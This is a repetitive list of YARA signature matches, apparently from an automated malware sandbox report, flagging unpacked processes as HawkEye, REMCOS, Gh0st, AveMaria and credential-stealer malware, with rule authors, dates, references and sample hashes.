                    Source: 44.2.Windows Update.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 3.2.bin.exe.2cee490.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.2.bin.exe.2cee490.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 43.2.Windows Update.exe.147b1458.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4ab6408.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.cmd.exe.690000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.3753258.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.cmd.exe.690000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.1.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 29.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.0.xxTzyGLZx5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.1.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b49c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.27bb310.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.3.xxTzyGLZx5.exe.7abf78.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.0.xxTzyGLZx5.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4b48208.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.3889660.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 3.2.bin.exe.3644490.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.2.bin.exe.3644490.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.41ce65.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.41ce65.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 37.2.5.exe.14907860.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.41ce65.16.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.493dc72.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
